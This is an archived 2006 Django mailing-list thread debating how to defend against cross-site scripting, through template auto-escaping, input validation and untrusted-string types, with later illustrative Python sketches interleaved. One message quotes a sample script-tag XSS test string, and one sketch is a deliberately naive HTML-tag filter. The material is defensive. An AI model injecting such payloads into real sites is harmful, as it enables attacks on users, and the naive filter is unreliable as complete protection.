documentation should emphasize as strongly as possible that it exists
and should be used.
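
As a rough illustration of what such a validator might look like, here is a minimal standalone sketch. The names has_no_html and ValidationError are hypothetical stand-ins defined locally, not Django's actual API, and the (field_data, all_data) signature is only assumed. The pattern is deliberately naive: it rejects anything that looks like an opening or closing tag, and it would not catch every form of markup that a lenient browser might accept.

```python
import re


class ValidationError(Exception):
    """Local stand-in for a framework validation error (assumption)."""


# A "<" immediately followed by an optional "/" and a letter, up to the next ">".
# A bare "<" followed by a space or digit is left alone.
_TAG_RE = re.compile(r"</?[A-Za-z][^>]*>")


def has_no_html(field_data, all_data=None):
    """Raise ValidationError if field_data contains something tag-like."""
    if _TAG_RE.search(field_data):
        raise ValidationError("HTML tags are not allowed in this field.")
```

With this pattern a value such as "1 < 2 and 3 > 2" passes, while "<script>alert(1)</script>" is rejected.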

And above and beyond that, I think we really need a well-written
security best-practices document which would cover escaping and input
validation as well as other factors. There are plenty of things within
Django that can be done to enhance security, and there are plenty of
non-Django things that users can implement to supplement that (e.g.,
if you're using Apache, get mod_security). It'd be great to mention
those and provide some concrete examples of how to use them
effectively.

James Bennett

unread,
Jun 21, 2006, 12:57:02 PM6/21/06
to django-d...@googlegroups.com
And just to clarify, when I talk about implementing the escaping
system, I mean a block tag which escapes everything inside itself as
appropriate. Nothing more, nothing less.

Simon Willison

unread,
Jun 21, 2006, 1:13:08 PM6/21/06
to django-d...@googlegroups.com

On 21 Jun 2006, at 17:48, James Bennett wrote:

> And while we're at it, let's get serious about input handling. The
> first thing which occurs to me is to add a 'hasNoHTML' validator in
> django.core.validators; possibly this would be accompanied by a
> boolean 'allows_html' argument to TextFields and CharFields, or maybe
> we just advertise judicious use of validator_list. Either way, the
> documentation should emphasize as strongly as possible that it exists
> and should be used.

Completely agree on input handling. Django's current validation stuff
is reasonable but it's not quite good enough - there are some crufty
things in the existing system (do_html2python is one particularly
noticeable wart) but it's still not easy enough to see how you would
validate a form that is nothing to do with a data model - a "contact
me" form for example. The manipulator API simply isn't easy enough to
use.

More to the point though, the smartest technique for input validation
I've seen is this kind of thing:

email = get_valid_email_address_from_GET_field('email')
age = get_positive_integer_from_POST_field('age')
date = get_python_date_from_GET_field('date')

Obviously those are ludicrous function names, but it should be clear
what they are doing. Rather than directly accessing GET and POST data
you do it through some mechanism that /guarantees/ the format of the
data returned - and raises an exception if it can't make that
guarantee. There is no possible way of invalid data ending up in the
email and age variables, so once you're past that bit of code you can
continue safe in the knowledge that the data is at least in the right
format.

Obviously I haven't figured out exactly how the API for this should
look, but I think the core concept is really powerful.
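
One way the idea could be sketched, purely as an illustration: the helpers below take a plain dict standing in for request.GET or request.POST and either return a value of the promised type or raise. The names InvalidInput, get_positive_integer and get_date are hypothetical, and the date format is an assumption.

```python
from datetime import date, datetime


class InvalidInput(ValueError):
    """Raised when a field cannot be converted to the promised format."""


def get_positive_integer(data, name):
    """Return data[name] as an int greater than zero, or raise InvalidInput."""
    raw = data.get(name, "")
    try:
        value = int(raw)
    except (TypeError, ValueError):
        raise InvalidInput("%s is not an integer: %r" % (name, raw))
    if value <= 0:
        raise InvalidInput("%s must be positive: %r" % (name, raw))
    return value


def get_date(data, name):
    """Return data[name] as a datetime.date (YYYY-MM-DD assumed), or raise."""
    raw = data.get(name, "")
    try:
        return datetime.strptime(raw, "%Y-%m-%d").date()
    except (TypeError, ValueError):
        raise InvalidInput("%s is not a date: %r" % (name, raw))
```

Code after a successful call can rely on the type of the result; a missing or malformed field never reaches it.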

Cheers,

Simon

oefe

unread,
Jun 21, 2006, 5:12:21 PM6/21/06
to Django developers
Hi,

I'm new to this group, so let me give you a little background about
myself:
I'm not a professional web developer (I'm writing Windows apps), but
have done a few private web projects for fun and to learn new things. I
recently redesigned a TurboGears project in Django, and liked the
experience very much. Especially the templating systems are like night
and day. But there is one thing that I liked about Kid: escaping just
works. By contrast, escaping in Django templates - well that's what this
thread is about....

James Bennett wrote:
> On 6/16/06, Christopher Lenz <cml...@gmx.de> wrote:
> > To reiterate: templates shouldn't need to care about escaping. Django
> > *in particular* uses an intentionally dumbed down template system
> > that is supposed to be easy for non-programmers, which includes the
> > notion that little mistakes in templates shouldn't break the site or
> > even introduce security holes.
>
> The problem here, architecture-wise, is that the template is the thing
> that cares about what output looks like. Moving the decision of
> whether to escape or not into some other part of the stack breaks with
> that and introduces the possibility of frustrating inconsistency in
> the templating system; explaining to a template author why {{ foo }}
> escapes in one case but not another, based on (to the template author)
> black magic happening in the backend isn't something I particularly
> want to do.
>
>
> > IMHO, a real solution for this problem is that any normal string
> > inserted into template output is escaped by default. This does not
> > necessarily mean that there needs to be an unescape filter, though.
>
> Yes. Yes, it does.
>
> > In fact, most of the time Django components that generate a string
> > they *know* that they are generating text that must not be escaped,
> > such as the output of the markdown filter, or form field render()
> > results. Those places should flag the strings they are generating in
> > some way (for example by wrapping them in a special class), thereby
> > signaling to the template system that those strings should not be
> > escaped again.
>
> As someone who's followed various RSS-related discussions for a long
> time, I can say that having multiple layers of a system have to worry
> about whether the other layers have escaped or unescaped something is
> a very special kind of hell that I don't want Django to get mired in.

Didn't confusion with RSS (and in many similar cases) come because
there were no clear and unambiguous rules, and different
implementations implemented different behaviour? By contrast, Atom uses
well-defined rules (XML), which are strictly supported by all XML
toolkits.

Likewise, XML-based templating systems like XSL or Kid don't have
escaping issues (as long as the output is XML or some closely related
format like html). For example in Kid, every template parameter is
escaped, except XML nodes (i.e. ElementTree objects). If you have a
string that is a valid XML fragment and that you don't want escaped,
you have to convert it into XML nodes (Kid provides the XML() function
to do this).

However, this is almost the only thing I like about XML-based
templates. In almost all other aspects, I prefer Django templates. It's
a trade-off between security and convenience, similar to static versus
dynamic typing. Guess what I prefer ;-)

Taking the typing comparison one step further, the escaping situation
in Django templates currently corresponds to weak typing, not to the
dynamic, but strong typing of python. I would prefer a stronger, but
still dynamic and flexible solution...

> But beyond that, it feels like a violation of loose coupling; doing
> this would bind Django components to each other in ways that don't
> feel right.

A component (tag, filter, context variable) that generates markup, for
example html, is already coupled to that format. This coupling doesn't
get stronger if you require that the component states this fact
clearly.

> My vote is for escaping being off unless explicitly turned on, and for
> it being turned on in the template.

Agreed.
To prevent XSS vulnerabilities because someone forgot to specify the
escaping rule, I would suggest that templates should, maybe even must
specify their escaping. For example, require each template to contain a
special {% autoescape <format> %} tag at the beginning, e.g. {%
autoescape html %}. If the designer doesn't want any auto-escaping, she
should say so: {% autoescape off %} (or plaintext, if you prefer).

For a transition period, this could be a should-condition. If a
template doesn't contain this tag, Django would output a warning and
assume autoescape off. Later, if you want it to be really strict, this
could be changed into an error. (It would also be possible to choose
between warning and error via a global setting, without causing
the php autoescape headaches.)

Likewise tags, filters, and context variables (together: template
input) that return markup must state this and specify its format. This
could be done with the escapedstr class described in the Wiki, but the
class should have an additional attribute that indicates the format.
The template could examine this attribute to decide whether to escape
this template input:
- if the format is plaintext or not specified at all (e.g. a plain
string), escape.
- if the format is the same as the template format, don't escape.
- if the format is different than the template format, complain. (Or do
something "smart" in special cases, for example a javascript format
could accept html, provided it is inside a javascript string? I think
this would be too much magic.)
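
The three rules above could be sketched roughly as follows. This is only an illustration: MarkupString, its markup_format attribute, ESCAPERS and render_value are hypothetical names, not the escapedstr class from the Wiki, and only an "html" and a "plaintext" template format are assumed.

```python
import html


class MarkupString(str):
    """A string that records which markup format it is already written in."""

    def __new__(cls, value, markup_format):
        obj = super().__new__(cls, value)
        # Not named "format", because str already has a format() method.
        obj.markup_format = markup_format
        return obj


# How to escape plain text for each template format (assumed set of formats).
ESCAPERS = {"html": html.escape, "plaintext": lambda text: text}


def render_value(value, template_format):
    """Apply the three rules: same format, plain text, or mismatch."""
    value_format = getattr(value, "markup_format", "plaintext")
    if value_format == template_format:
        return str(value)  # already in the template's format: don't escape
    if value_format == "plaintext":
        return ESCAPERS[template_format](str(value))  # plain text: escape
    raise ValueError(
        "cannot insert %s markup into a %s template" % (value_format, template_format)
    )
```

A plain Python string is treated as plaintext, so it is escaped in an html template, while a MarkupString tagged "html" passes through untouched.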

ciao
Martina

Tom Tobin

unread,
Jun 21, 2006, 5:40:00 PM6/21/06
to django-d...@googlegroups.com
On 6/21/06, oefe <mar...@oefelein.de> wrote:
>
> Agreed.
> To prevent XSS vulnerabilities because someone forgot to specify the
> escaping rule, I would suggest that templates should, maybe even must
> specify their escaping. For example, require each template to contain a
> special {% autoescape <format> %} tag at the beginning, e.g. {%
> autoescape html %}. If the designer doesn't want any auto-escaping, she
> should say so: {% autoescape off %} (or plaintext, if you prefer).

Oh ye gods, please no. :-)

This is exactly what James was referring to as "security by
annoyance"; forcing me to place a boilerplate like that at the top of
every template is going to get frustrating, fast.

SmileyChris

unread,
Jun 21, 2006, 6:16:24 PM6/21/06
to Django developers
James Bennett wrote:
> Security by annoyance is security that people learn to hate and turn
> off as soon as they can, so in the end it doesn't really make them any
> more secure than they were before.

Having used TAL a lot (like KID, automatically escapes), I did not
actually find this annoying.
Maybe it's just a different mindset, but I'd rather have an occasional
"oh yea, I meant to pass that raw" experience rather than have the
chance of missing variables that should be escaped.

The thing is, it's very hard to "miss" a variable that you meant to
pass raw when testing. It's very easy to miss one that you should have
escaped. Maybe I'm just not god-like enough...

I'm feeling a bit disparaged that some key people don't seem to see
this as an issue.

Jacob Kaplan-Moss

unread,
Jun 21, 2006, 6:31:43 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 12:13 PM, Simon Willison wrote:
> Rather than directly accessing GET and POST data
> you do it through some mechanism that /guarantees/ the format of the
> data returned - and raises an exception if it can't make that
> guarantee. There is no possible way of invalid data ending up in the
> email and age variables, so once you're past that bit of code you can
> continue safe in the knowledge that the data is at least in the right
> format.
>
> Obviously I haven't figured out exactly how the API for this should
> look, but I think the core concept is really powerful.

OK, *now* we're getting somewhere!

Another place to start solving the XSS problem is at the input level;
a policy of "don't trust data from the web" makes a lot more sense to
me than one of "don't trust the template author".

Following that thread, I'm much more receptive to ideas involving
"tainting" the data in request.GET and friends. Actually, I'm going
to try to stay away from the word "taint" since it evokes both a
nasty bit of perl *and* a nasty bit of male anatomy...

Anyway, here's a rough sketch of how I'd picture enforced mistrust of
browser-supplied data:

1. request.GET['whatever'] returns an ``untrusted_string`` object, not
a regular string

2. Methods exist somewhere to "translate" untrusted strings into
"normal" strings given a particular format. Like Simon, I'm not sure
how to spell this, but I'm sure a good syntax could be found.

3. Manipulator's ``do_html2python`` methods automatically call these
untrusted -> trusted methods based on field types; this makes the
common case of using a manipulator unchanged.

4. The template engine automatically escapes untrusted strings
(unless explicitly passed through a ``raw`` filter) -- this protects
you from errors when echoing back data given from the browser.

5. If untrusted strings "sneak" all the way down to the database
layer... well, I'm not sure about this step; potential options are
(a) automatically escaping before storing in the database, (b)
raising an exception, or (c) just letting it happen. I think I
prefer (b).
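
A very rough sketch of steps 1, 2, 4 and 5(b), only to make the idea concrete. All names here (UntrustedString, to_trusted_int, render_variable, save_to_database) are hypothetical, and the database write is a stand-in that just returns the value.

```python
import html


class UntrustedString(str):
    """Step 1: marks text that came from the browser and was never validated."""


def to_trusted_int(value):
    """Step 2: translate an untrusted string into a normal value of a known format."""
    return int(value)  # raises ValueError if the text is not an integer


def render_variable(value, raw=False):
    """Step 4: the template engine escapes untrusted strings unless told not to."""
    if isinstance(value, UntrustedString) and not raw:
        return html.escape(value)
    return str(value)


def save_to_database(value):
    """Step 5, option (b): refuse untrusted strings at the database layer."""
    if isinstance(value, UntrustedString):
        raise TypeError("refusing to store an untrusted string")
    return value  # stand-in for the real write
```

One limitation of a plain str subclass is that ordinary string operations (concatenation, slicing, formatting) return regular str objects, so the marker is lost unless those operations are wrapped as well.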

Thoughts?

Jacob

PS: To be a bit more explicit about my thoughts on this whole thread:
I'd say at this point any XSS proposal that involves some sort of
mangling at the template level is pretty much a non-starter. So
let's all focus our attentions on attacking this problem from the
other direction.

Rudolph

unread,
Jun 21, 2006, 6:35:42 PM6/21/06
to Django developers
Hi,

How about adding a command to django-admin.py that scans all the
templates of the project and enabled apps and gives you a list of
templates that have unescaped values in them, maybe even displays the
tags/lines concerned. IMHO this could be very valuable info for a
developer.
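
The core of such a scan might look something like the sketch below. It is a naive, regex-based illustration (find_unescaped_variables is a hypothetical name, not an existing django-admin.py command): it looks only at {{ ... }} variable tags, works line by line, and would be confused by a "|" inside a filter argument.

```python
import re

# Matches a variable tag and captures everything between the braces.
VARIABLE_RE = re.compile(r"\{\{\s*(.*?)\s*\}\}")


def find_unescaped_variables(template_source):
    """Return (line_number, tag_text) pairs for variables without an escape filter."""
    findings = []
    for line_number, line in enumerate(template_source.splitlines(), start=1):
        for match in VARIABLE_RE.finditer(line):
            # Everything after the first "|" is a chain of filters;
            # drop any ":argument" part to get the bare filter names.
            filters = [
                part.split(":")[0].strip()
                for part in match.group(1).split("|")[1:]
            ]
            if "escape" not in filters:
                findings.append((line_number, match.group(0)))
    return findings
```

A real command would walk the template directories of the project and its enabled apps and call something like this on each file.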

Rudolph

Jacob Kaplan-Moss

unread,
Jun 21, 2006, 6:41:33 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 5:16 PM, SmileyChris wrote:
> Having used TAL a lot (like KID, automatically escapes), I did not
> actually find this annoying.

I really wish there was a way of saying this that didn't make me
sound like a jerk... but:

If you like TAL better, use it.

Again, I'm not trying to be mean; it's just that there's no way that
Django's template language can be everything to everybody. There's
no right and wrong here, there's just what "fits" with the rest of
the framework, and encapsulating a distrust of the developer into
this framework doesn't feel right.

Yes, Django should be accessible to newbies, but newbie-friendliness
needs to be balanced against the needs of experienced web developers
(who likely already know all about XSS).

In the end the awesome, amazing, wonderful thing about Python is the
size of the ecosystem. If auto-escaping in templates is not
negotiable for you, you can always turn elsewhere -- and that's a
feature, not a bug!

> I'm feeling a bit disparaged that some key people don't seem to see
> this as an issue.

Security is a very big issue, and I at least take this discussion
very seriously. Don't mistake a distaste for the proposed solution
for apathy about the problem.

So that's my story, and I'm sticking to it :)

Jacob

Tyson Tate

unread,
Jun 21, 2006, 7:21:32 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 3:31 PM, Jacob Kaplan-Moss wrote:

> [...]


> Another place to start solving the XSS problem is at the input level;
> a policy of "don't trust data from the web" makes a lot more sense to
> me than one of "don't trust the template author".

Modded "+5 Insightful" :) I can attest personally [1] that doing it
the other way around is an invitation to disaster and inherently
insecure code. The last thing Django needs is a reputation for
insecurity and to go down the path of phpBB and mailman et al. Making
it easy to be secure (i.e. secure by default) benefits everyone. I'd
rather have to manually "non-escape" the occasional string than
escape most all of my strings by hand.

> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.

Heck, why not Python's own cgi.escape? [2] Seems trusty enough to me,
though I could be wrong because I'm no Python expert. And, of course,
we can always just use a wrapper method to build on cgi.escape to
allow for further escaping/whatever. (Then again, perhaps I
misunderstood what you meant by "translate".)

> [...]


>
> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this protects
> you from errors when echoing back data given from the browser.

+1 Amen!

> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options are
> (a) automatically escaping before storing in the database, (b)
> raising an exception, or (c) just letting it happen. I think I
> prefer (b).
>

I think a full-on exception might be a bit harsh, but it could be the
best solution. I don't intend to open a can of worms up here, but
what if manage.py offered a "basic security check" function that is
either run only explicitly by the user or as part of some other
function (syncdb etc.) that checks for untrusted strings that are
publicly viewable and simply lists them as warnings?

> Thoughts?

Given!

-Tyson

[1] Here at work, we have dozens of JSP intranet apps (*shudder*)
that we've had to go through and implement string escaping for
*everything*. Anything that gets displayed that in some way or form
could have possibly been touched by the outside world must be escaped
manually. *barf*

[2] Sample from Wikipedia's excellent XSS article:

>>> import cgi

>>> print "<script>alert('xss');</script>"
<script>alert('xss');</script>

>>> print cgi.escape("<script>alert('xss');</script>");
&lt;script&gt;alert('xss');&lt;/script&gt;
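
For readers running a current Python: cgi.escape was removed from the standard library in Python 3.8, and html.escape is the replacement. A minimal equivalent of the sample above follows; note that html.escape also escapes quote characters by default, which cgi.escape did not.

```python
import html

payload = "<script>alert('xss');</script>"
escaped = html.escape(payload)  # escapes &, <, > and, by default, both quote characters
print(escaped)
```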

Ian Holsman

unread,
Jun 21, 2006, 9:07:02 PM6/21/06
to django-d...@googlegroups.com
I have to agree with these comments.
get the crap out at the 'input'/validation level.. once it has reached the
database/rendering stage it is too late.

while this submission isn't perfect, this is what I did to protect
against my own laziness on externally facing apps.

http://svn.zyons.python-hosting.com/trunk/zilbo/common/utils/middleware/SafePost.py

before you go attack the code, I know it doesn't catch everything,
and I plan on switching to feedparser's validation soon.

the concept is that EVERY post request field is sanitized before it
even hits the view's code.
possible enhancements would be to have a 'exclude' list of field
names which it wouldn't sanitize. (which would be set in your
settings.py file)

the other positive about this is that it is 100% optional. if you
don't want to do XSS parsing you don't need to load it.
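
To illustrate the concept only (this is not the code from SafePost.py, whose details are not shown here): a function that sanitizes every field of a POST-like dict except those on an exclude list. The name sanitize_post is hypothetical, and HTML-escaping is assumed as the sanitizing step purely for the sake of the example.

```python
import html


def sanitize_post(post_data, exclude=()):
    """Return a copy of post_data with every non-excluded field HTML-escaped."""
    return {
        name: value if name in exclude else html.escape(value)
        for name, value in post_data.items()
    }
```

A middleware would call something like this on each request before the view runs, with the exclude list read from settings.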

Todd O'Bryan

unread,
Jun 21, 2006, 9:35:26 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 6:41 PM, Jacob Kaplan-Moss wrote:

> There's
> no right and wrong here, there's just what "fits" with the rest of
> the framework, and encapsulating a distrust of the developer into
> this framework doesn't feel right.

Does there seem to be consensus out there among web frameworks about
whether escape=default, raw=exception or raw=default, escape=exception?

I came to Django from Tapestry and was used to default escaping. In
fact, I now have to go back and add an escape filter to all my tags,
because none of them *need* to be raw yet, and I'd prefer not to
allow raw HTML unless I think it might be necessary.

Regardless of how this gets solved (and I'd prefer escaping, by
default; the number of times I *need* raw HTML is small), shouldn't
it be configurable by putting the appropriate tag in your base
template, either to turn it on or off. *That's* the deal-breaker, I
think. I should be able to put

{% auto_escape on %}

blah blah blah

{% auto_escape %}

in the template that's the supertemplate of all templates and get the
behavior I want by default in everything. Given that it should only
be two lines to get whatever you want, I think the default-ness is
not that big a deal.

Todd

Jacob Kaplan-Moss

unread,
Jun 21, 2006, 9:57:01 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 8:35 PM, Todd O'Bryan wrote:
> Does there seem to be consensus out there among web frameworks about
> whether escape=default, raw=exception or raw=default,
> escape=exception?

Not really sure, myself -- my impression is that most web frameworks
don't think about XSS all that hard at all (and just leave it up to
developers to Do The Right Thing) but I'm not sure, really.

> I should be able to put
>
> {% auto_escape on %}
>
> blah blah blah
>
> {% auto_escape %}
>
> in the template that's the supertemplate of all templates and get the
> behavior I want by default in everything.

Yes, I agree -- I've never been against a template tag which does
autoescape because that's still leaving power in the hands of the
template authors.

Jacob

SmileyChris

unread,
Jun 21, 2006, 10:29:08 PM6/21/06
to Django developers
Hi Jacob,

On Jun 21, 2006, at 5:16 PM, SmileyChris wrote:
> > Having used TAL a lot (like KID, automatically escapes), I did not
> > actually find this annoying.

Jacob Kaplan-Moss wrote:
> I really wish there was a way of saying this that didn't make me
> sound like a jerk... but:
>
> If you like TAL better, use it.

Don't worry, no offense taken. I don't like TAL better, I was merely
pointing out that I did not find this an annoying behaviour.
I also understand that Django's template language can't please
everybody and that I am free to use alternate templating systems.

My point was simply that even though I would place myself in the
"experienced web developer" category, I personally preferred
auto-escaping systems.

Out of interest, have you (both Jacob and anyone else involved in this
discussion) seriously tried both and had a problem with auto-escaping?

> Yes, Django should be accessible to newbies, but newbie-friendliness
> needs to be balanced against the needs of experienced web developers
> (who likely already know all about XSS).

Out of interest, have you (both Jacob and anyone else involved in this
discussion) seriously tried an auto-escaping templating system and had
a problem with it opposing your needs?

Jacob Kaplan-Moss

unread,
Jun 21, 2006, 10:54:37 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 9:29 PM, SmileyChris wrote:
> Out of interest, have you (both Jacob and anyone else involved in this
> discussion) seriously tried an auto-escaping templating system and had
> a problem with it opposing your needs?

At the risk of turning this into a war stories thread, I've had to
deal with:

* a templating system that throws a hard error any time you try to
output anything that looks like HTML which the system seems to
interpret as "anything with a '<', '>', or '&' in it"

* a so-called "security" layer that urlencodes (why? who knows...)
every piece of GET or POST data (resulting in double-encoded content
much of the time)

* HTML stored in a database as "&amp;lt;a
href=&amp;quot;#link&amp;quot;&amp;gt;" for reasons nobody could
figure out

* and, yes, template systems that automatically escaped data.

Of course, the first three are *far* worse than the last one, but all
lie on the continuum of automatically screwing with my data in the
name of "safety".
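
The double-encoded database value in the third item is what you get when escaping is applied twice to the same data, which is easy to reproduce as a small demonstration (using Python's html module here; the original system's language is not stated):

```python
import html

original = '<a href="#link">'
once = html.escape(original)   # what a single, correct escaping pass produces
twice = html.escape(once)      # what a second, unwanted pass does to it

print(once)
print(twice)
```

Undoing the damage takes two unescape passes, and nothing in the stored value itself says how many passes were applied.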

Jacob


Tyson Tate

unread,
Jun 21, 2006, 11:00:22 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 6:57 PM, Jacob Kaplan-Moss wrote:

> Yes, I agree -- I've never been against a template tag which does
> autoescape because that's still leaving power in the hands of the
> template authors.

Then again, how often do you *want* to allow your users to put HTML
and JS in and allow it to be executed? Not often, I imagine. And
following that, I think Django should, of the two options, cover the
majority, which I believe is "escape by default" and allow {%
autoescape off %}. For the sake of security, I'm really hoping to see
escaping automatically turned on.

Regards,
Tyson

James Bennett

unread,
Jun 21, 2006, 11:50:11 PM6/21/06
to django-d...@googlegroups.com
On 6/21/06, Tyson Tate <ty...@fallingbullets.com> wrote:
> Then again, how often do you *want* to allow your users to put HTML
> and JS in and allow it to be executed? Not often, I imagine.

This depends completely on the type of application. Some applications
will have very little HTML input by users, but some applications may
have tons and tons of HTML input by users.

> And
> following that, I think Django should, of the two options, cover the
> majority, which I believe is "escape by default" and allow {%
> autoescape off %}. For the sake of security, I'm really hoping to see
> escaping automatically turned on.

Has the world honestly learned not one single solitary thing from
PHP's magic_quotes fiasco? Autoescaping all output by default is
something that is unequivocally not acceptable.

Matt McDonald

unread,
Jun 22, 2006, 12:08:12 AM6/22/06
to django-d...@googlegroups.com
If you don't ever want to display the html then it shouldn't be
stored in the first place. The escaping/removing should be done when
processing the input. What's better:

1. escaping/removing when the data is saved (one time occasion) or
2. escaping/removing each time the data is used (infinite times)

So I think we should be concentrating more on what gets through the
input and stored rather than worrying about if something needs to be
escaped or not and by default or not.

Tyson Tate

unread,
Jun 22, 2006, 12:11:14 AM6/22/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 8:50 PM, James Bennett wrote:
> Has the world honestly learned not one single solitary thing from
> PHP's magic_quotes fiasco? Autoescaping all output by default is
> something that is unequivocally not acceptable.

Oh - I haven't heard of the magic_quotes fiasco. Do you have any
links or more information about this? If it blew up for the PHP
folks, I think I'd be prone to changing my position on the issue.

Regards,
Tyson

James Bennett

unread,
Jun 22, 2006, 12:54:13 AM6/22/06
to django-d...@googlegroups.com
On 6/21/06, Tyson Tate <ty...@fallingbullets.com> wrote:
> Oh - I haven't heard of the magic_quotes fiasco. Do you have any
> links or more information about this? If it blew up for the PHP
> folks, I think I'd be prone to changing my position on the issue.

The magic_quotes setting in PHP is a "feature" which attempted to
automatically escape input data. The theory was that it would prevent
SQL injection attacks (which were and still are a common form of
attack against database-backed applications) by escaping data before
storage.

In reality, however, it proved to be a nightmare for application
developers; you never knew if a particular host's setup would have
magic_quotes on or off, and there were actually *two* commonly used
settings and a third less-common one which could enable various forms
of escaping. Before you could even think about looking at data your
program received, you had to test for these settings to figure out
what sort of escaping PHP was "helpfully" doing for you.

It's led to an interesting situation where, despite being turned on by
default in PHP, the official documentation recommends turning it off.
Supposedly, PHP6 will finally send magic_quotes to the grave.

Michael Radziej

unread,
Jun 22, 2006, 3:33:13 AM6/22/06
to django-d...@googlegroups.com

Am 22.06.2006 um 06:54 schrieb James Bennett:

>
> On 6/21/06, Tyson Tate <ty...@fallingbullets.com> wrote:
>> Oh - I haven't heard of the magic_quotes fiasco. Do you have any
>> links or more information about this? If it blew up for the PHP
>> folks, I think I'd be prone to changing my position on the issue.
>
> The magic_quotes setting in PHP is a "feature" which attempted to
> automatically escape input data. The theory was that it would prevent
> SQL injection attacks (which were and still are a common form of
> attack against database-backed applications) by escaping data before
> storage.

Now, come on, that's a completely different thing than auto-escaping
of variables in the template. I had no idea php is/was *that* brain-
dead (*shiver*)

Was this your experience with auto-escaping? Then it wasn't.

Michael


Michael Radziej

unread,
Jun 22, 2006, 3:33:29 AM6/22/06
to django-d...@googlegroups.com
Hey,

First, let me note that we're discussing one aspect of Django and
whether or not there is a sensible way to harden it against XSS
exploits. It is not whether this or the other way is better ...

Now, I don't like to put the whole burden into the input validation,
since I believe

* There's no reason to restrict user input
* It's nearly impossible to do it properly since many browsers have
strange interpretations of html

and

* there might be another application writing stuff into the database
which might not validate the input to the same level. (And that's
what I currently work on ... sigh.)

> Another place to start solving the XSS problem is at the input level;
> a policy of "don't trust data from the web" makes a lot more sense to
> me than one of "don't trust the template author".

It's not about trusting the template author. It's about experience
that shows that these tiny things are forgotten *all the time by
everybody*. So I say:

A policy of properly turning data into its html format ("escaping")
makes a lot more sense to me than one of "censor the user and
restrict what they are allowed to write"

;-)

> Anyway, here's a rough sketch of how I'd picture enforced mistrust of
> browser-supplied data:
>
> 1. request.GET['whatever'] returns a ``untrusted_string`` object, not
> a regular string
>
> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.
>
> 3. Manipulator's ``do_html2python`` methods automatically call these
> untrusted -> trusted methods based on field types; this makes the
> common case of using a manipulator unchanged.
>
> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this protects
> you from errors when echoing back data given from the browser.
>
> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options are
> (a) automatically escaping before storing in the database, (b)
> raising an exception, or (c) just letting it happen. I think I
> prefer (b).

5 (a) looks horrible. This is what "munging your data" really means
in a bad sense.
I'm undecided between b or c.

>
> Thoughts?

Now, it *does* look interesting, although it won't help me since
there's another application parallel to mine that fills data into the
database.

Anyway, if this would be the way to go, I'd add:


6) A database field UntrustedTextField (or whatever, couldn't think
of a better name).
It's for data where the user is allowed to enter everything they
want, and it needs to be
properly escaped for display on an html page.
Its do_html2python would return an untrusted string, so that the
template system would
escape it as you specified in step 4.

Then, I'd like to see a sketch how exactly you want to validate a
normal TextField (not the UntrustedTextField). I think this is
really, really hard if not impossible.

>
> PS: To be a bit more explicit about my thoughts on this whole thread:
> I'd say at this point any XSS proposal that involves some sort of
> mangling at the template level is pretty much a non-starter. So
> let's all focus our attentions on attacking this problem from the
> other direction.

Agreed. I really don't distrust the template author to that level ;-)

Michael Distrusts-Himself


James Bennett

unread,
Jun 22, 2006, 3:36:02 AM6/22/06
to django-d...@googlegroups.com
On 6/22/06, Michael Radziej <m...@django.m1.spieleck.de> wrote:
> Now, come on, that's a completely different thing than auto-escaping
> of variables in the template. I had no idea php is/was *that* brain-
> dead (*shiver*)

The problem of suddenly having to figure out ways to tell whether
you're dealing with escaped or unescaped content is the same.
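
A minimal sketch of that ambiguity, assuming Python's standard
html.escape stands in for whatever escaping the framework applies (the
variable names are only illustrative): once a string may or may not have
been escaped already, escaping it again silently corrupts it.

```python
import html

raw = "Tom & Jerry"

# Escaped once: correct for an HTML page.
once = html.escape(raw)

# Escaped again by code that could not tell it was already escaped:
# the ampersand of the entity itself gets escaped.
twice = html.escape(once)

print(once)   # Tom &amp; Jerry
print(twice)  # Tom &amp;amp; Jerry
```

Nothing in the string itself says how many times it has been escaped,
which is why the code has to carry that information some other way.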

James Bennett

unread,
Jun 22, 2006, 3:48:06 AM6/22/06
to django-d...@googlegroups.com
On 6/22/06, Michael Radziej <m...@django.m1.spieleck.de> wrote:
> Now, I don't like to put the whole burden into the input validation,

And nobody's really suggesting that we should; we already provide a
template filter for sanitizing on output, and a block tag for doing
the same seems like a decent idea. Now let's focus on input and make
sure we're providing mechanisms for securing things on both ends.

> * There's no reason to restrict user input

Sure there is; just look at the 'hasNoProfanities' validator in
django.core.validators for an example.

> * It's nearly impossible to do it properly since many browsers have
> strange interpretations of html

?

> * there might be another application writing stuff into the database
> which might not validate the input to the same level. (And that's
> what I currently work on ... sigh.)

That's what database-level validation is for.

> It's not about trusting the template author. It's about experience
> that shows that these tiny things are forgotten *all the time by
> everybody*. So I say:

So... you don't trust them is what you're saying?

> A policy of properly turning data into its html format ("escaping")
> makes a lot more sense to me than one of "censor the user and
> restrict what they are allowed to write"

There's a big whopping difference between "censoring" and stopping
hackers from launching XSS attacks.

> 6) A database field UntrustedTextField (or whatever, couldn't think
> of a better name).

Every text field in a database is an UntrustedTextField until you do
something to make it not be so.

> It's for data where the user is allowed to enter everything they
> want

Which returns us to the situation that made me bring up input
validation in the first place: if you go ahead and concede that
"anything" can go into the database, you now have a single point of
failure. Either your escaping system for output has to be 100% perfect
100% of the time, or you're screwed.

That's not good security practice, and I don't want to see Django advocating it.

> Then, I'd like to see a sketch how exactly you want to validate a
> normal TextField (not the UntrustedTextField). I think this is
> really, really hard if not impossible.

For given values of "validate", yes. It is, however, easy to write
validator functions which will reject anything that looks like HTML,
and HTML is the most important threat.

I think part of the problem we've been having since this discussion
started is that it's tempting to believe that there's some magic
bullet that can make things secure -- that if only we'd escape
